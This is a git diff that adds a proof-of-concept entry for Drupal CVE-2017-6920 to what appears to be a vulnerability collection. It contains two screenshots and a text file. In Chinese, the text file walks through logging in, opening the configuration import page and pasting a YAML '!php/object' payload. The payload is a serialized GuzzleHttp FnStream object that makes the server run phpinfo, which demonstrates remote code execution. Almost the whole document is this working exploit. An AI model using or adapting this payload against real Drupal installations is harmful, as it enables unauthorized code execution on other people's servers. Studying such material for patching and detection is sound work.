diff --git "a/Drupal/Drupal\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2017-6920)/1.png" "b/Drupal/Drupal\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2017-6920)/1.png"
new file mode 100644
index 0000000..a204973
Binary files /dev/null and "b/Drupal/Drupal\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2017-6920)/1.png" differ
diff --git "a/Drupal/Drupal\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2017-6920)/2.png" "b/Drupal/Drupal\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2017-6920)/2.png"
new file mode 100644
index 0000000..9f1dc3b
Binary files /dev/null and "b/Drupal/Drupal\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2017-6920)/2.png" differ
diff --git "a/Drupal/Drupal\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2017-6920)/poc.txt" "b/Drupal/Drupal\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2017-6920)/poc.txt"
new file mode 100644
index 0000000..c8e41d8
--- /dev/null
+++ "b/Drupal/Drupal\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2017-6920)/poc.txt"
@@ -0,0 +1,7 @@
+在/user/login登陆后
+访问http://xx.xx.xx.xx/admin/config/development/configuration/single/import
+   
+Configuration type：Simple configuration
+Configuration name：随意填写
+Paste your configuration here填写以下poc
+!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
\ No newline at end of file